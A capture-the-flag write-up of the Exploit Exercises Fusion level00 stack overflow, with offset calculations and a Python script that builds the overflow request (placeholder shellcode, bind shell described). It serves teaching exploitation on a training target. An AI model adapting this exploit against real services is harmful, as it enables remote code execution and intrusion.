Exploit Exercises - Fusion Level00
This challenge is pretty much a straightforward stack overflow. When the program calls `realpath` on our `path`, the length of `path` is controlled by the initial `read` in `parse_http_request`, because `path` is simply a pointer to a location 4 bytes into `buffer`. Looking up what `realpath` does, we find that it copies the given `path` string into the `resolved` buffer, expanding any relative components along the way. `realpath` also checks that the file actually exists and returns `NULL` if it does not, but the path is written into `resolved` as it is being resolved, so the overflow has already happened by the time `NULL` comes back. For our sake we really don't care whether we ever reach the `strcpy`: `realpath` does the same thing for us!
So now that we know what we are targeting, we need to make sure we pass the earlier checks to actually get to this point.
From this we can deduce that our payload is going to be of the form `GET <fill buffer><return address> HTTP/1.1<nop sled><shellcode>`. You can stick your shellcode inside the NOP sled if you like, but it is up to you :D Since we want `$eip` to point to our shellcode, which sits some number of bytes from the start of our buffer, we can take the buffer address that the program leaks to us and add an offset to land in the NOP sled (the sled is optional since we could calculate the exact offset, but I was too lazy lol). With some playing around in the binary you find that 139 bogus characters fill the buffer; after the 139th character you begin to overwrite the return address :D. Counting from the start of `buffer`, that puts the saved return address at 4 (`GET `) + 139 bytes, and the NOP sled at 4 + 139 + 4 + 9 (` HTTP/1.1`) = 156 bytes, so any address from buffer address + 156 up to the end of the sled works as the return address. One check worth doing on the address you pick: none of its four bytes may be 0x00, 0x20 or 0x2f, since a NUL terminates the path, a space is what `strchr` uses to find the end of the path, and a slash makes `realpath` treat what came before it as a separate path component. Putting it all together and sending the request, we then have a shell listening on port 1337 that we can nc into :D
(I used a collection of helper functions from Blankwall's Template library; I encourage you to check it out on GitHub.)
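Below is an added example of my own, not the script from the original write-up and not Blankwall's template, that builds the request laid out above. It parses the leaked buffer address out of the debug banner, derives the sled offset from the 139-byte figure, picks a return address inside the sled that contains none of the bytes the parser or `realpath` would choke on, and assembles the request. The banner text, the 64-byte sled, the `A` filler and the int3 stand-in shellcode are assumptions; the real bind shell on port 1337 would replace the stand-in.

```python
import re
import struct

# Request layout for the level00 overflow (constants taken from the write-up and
# the checks in parse_http_request):
GET_PREFIX = b"GET "            # memcmp(buffer, "GET ", 4); path = &buffer[4]
PROTO = b" HTTP/1.1"            # strchr(path, ' ') must find this space, then "HTTP/1.1"
RET_OFFSET = 139                # filler bytes in path before the saved return address
BUFFER_SIZE = 1024              # read(0, buffer, sizeof(buffer))
NOP = b"\x90"

# Bytes the return address (and filler) must not contain: NUL ends the string,
# a space is where strchr cuts the path, and '/' makes realpath start a new
# path component (it will lstat the garbage before it and bail out early).
BAD_BYTES = {0x00, 0x20, 0x2f}

# Stand-in for the bind-shell shellcode (int3 x 8). Not the write-up's payload;
# the real port-1337 bind shell goes here. Bytes after " HTTP/1.1" are never
# parsed, so the shellcode itself is free of the BAD_BYTES restriction.
SHELLCODE = b"\xcc" * 8


def parse_leak(banner: bytes) -> int:
    """Pull the stack address out of the '[debug] buffer is at 0x........' banner."""
    m = re.search(rb"buffer is at 0x([0-9a-fA-F]{1,8})", banner)
    if m is None:
        raise ValueError("no buffer address in banner")
    return int(m.group(1), 16)


def sled_offset() -> int:
    """Offset of the first NOP from the start of buffer: 4 + 139 + 4 + 9 = 156."""
    return len(GET_PREFIX) + RET_OFFSET + 4 + len(PROTO)


def has_bad_bytes(data: bytes) -> bool:
    return any(b in BAD_BYTES for b in data)


def pick_return_address(buffer_addr: int, sled_len: int) -> int:
    """Pick an address inside the NOP sled, nearest its middle, that survives the parser."""
    start = buffer_addr + sled_offset()
    mid = start + sled_len // 2
    for addr in sorted(range(start, start + sled_len), key=lambda a: abs(a - mid)):
        if not has_bad_bytes(struct.pack("<I", addr)):
            return addr
    raise ValueError("no usable address in the sled; change the sled length")


def build_request(buffer_addr: int, sled_len: int = 64, shellcode: bytes = SHELLCODE) -> bytes:
    """Assemble: GET <filler><ret> HTTP/1.1<nop sled><shellcode>."""
    ret = pick_return_address(buffer_addr, sled_len)
    filler = b"A" * RET_OFFSET
    req = GET_PREFIX + filler + struct.pack("<I", ret) + PROTO + NOP * sled_len + shellcode
    if len(req) > BUFFER_SIZE:
        raise ValueError("request does not fit in the 1024-byte read")
    # The first space after "GET " must be the one in front of HTTP/1.1,
    # otherwise the protocol check fails before realpath is ever called.
    if req.index(b" ", len(GET_PREFIX)) != len(GET_PREFIX) + RET_OFFSET + 4:
        raise ValueError("stray space inside the path")
    return req


def extract_return_address(req: bytes) -> int:
    """Read back the 4-byte little-endian return address from a built request."""
    off = len(GET_PREFIX) + RET_OFFSET
    return struct.unpack("<I", req[off:off + 4])[0]


if __name__ == "__main__":
    # Constructed banner standing in for what the service prints on connect.
    banner = b"[debug] buffer is at 0xbffff8dc :-)\n"
    buf = parse_leak(banner)
    req = build_request(buf)
    print(f"buffer @ {buf:#010x}, ret -> {extract_return_address(req):#010x}, "
          f"sled @ {buf + sled_offset():#010x}, {len(req)} bytes")
```

In a live run the banner comes from the socket right after connecting and `build_request` is sent back over the same socket; the middle-of-sled choice gives slack in both directions if the leaked address is a few bytes off from where the sled actually lands.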